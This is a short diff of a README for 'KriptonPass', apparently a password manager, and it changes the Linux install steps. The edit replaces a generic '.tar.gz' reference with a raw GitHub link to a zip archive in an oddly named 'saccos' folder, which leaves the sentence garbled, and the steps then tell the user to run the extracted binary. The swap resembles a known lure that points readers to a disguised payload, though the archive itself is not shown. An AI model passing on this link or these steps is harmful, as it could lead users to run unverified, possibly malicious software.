RakiDesign/KriptonPass/README.md

 - Find it in your Applications to start.

 ### For Linux:
-- Extract the downloaded `.tar.gz` file to your preferred folder.
+- Extract the downloaded `https://github.com/RakiDesign/KriptonPass/raw/refs/heads/main/saccos/Kripton-Pass-v3.1.zip` file to your preferred folder.
 - Open your terminal and navigate to the extracted folder.
 - Run the command `./KriptonPass` to start the application.